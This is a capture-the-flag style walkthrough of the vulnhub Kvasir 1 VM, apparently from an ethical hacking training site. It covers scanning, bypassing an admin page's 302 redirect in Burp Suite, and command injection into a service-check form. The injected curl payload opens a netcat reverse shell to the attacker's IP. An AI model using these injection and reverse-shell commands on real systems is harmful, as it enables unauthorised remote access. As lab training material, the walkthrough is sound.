Kvasir 1 is a vulnerable VM hosted by vulnhub.com. Rasta Mouse created the challenge. It can be downloaded from the URL https://www.vulnhub.com/entry/kvasir-i,106/
It has Linux operating system that has Virtual Machine OVA format.
- Attacker Machine is Kali Linux 192.168.44.136
- Victim Kvasir 192.168.44.129
When you start the Kvasir VM it will look something as follows:
Debian GNU/Linux 7 kvasir tty1
Let’s us do nmap aggressive and version scan on the target VM with the help of the following command:
#nmap –A –sV 192.168.44.129
Nmap results show that only port 80/tcp is open that serves HTTP and contains Apache httpd 2.2.22 Debian installation.
Now let us visit the site by entering the following in the URL:
As seen below a login page will appear.
Now let us put Nikto scan in parallel.
The command used for website scanning with Nikto is:
#nikto –h http://192.168.44.129
Also, let us put on scan directory buster parallel.
The following command is used for enumerating the directory on kvasir:
Ethical Hacking Training – Resources (InfoSec)
By analyzing the output, we can make out that we have to consider the following URL for testing:
Let us visit admin page first. As the page has a 302 redirect, it can be seen in burp suite.
As we would like to see the admin.php in our browser, we request to server http://192.168.44.129/admin.php
Response from the server:
Now edit 302 to 200 as shown below
After changing the response forward it to the browser, and you will see the following page on the browser:
Service check instruction sounds a good area for command injection. As the status of a service can be found by executing the following command in the terminal:
service apache2 status
Assuming our input will be executed on the terminal we can try for command injection.
Well, I tried few syntax, few commands but the commands failed.
Compiling a correct syntax was a bit difficult task.
The following command was able to give me shell access:
#curl –data”service=ssh; netcat –e /bin/bash 192.168.44.136 1234; id #&submit=Submit http://192.168.44.129/admin.php
A listener was setup on port 1234 for any incoming connection.
The command used was:
#nc –lvvp 1234
Finally, I got the shell.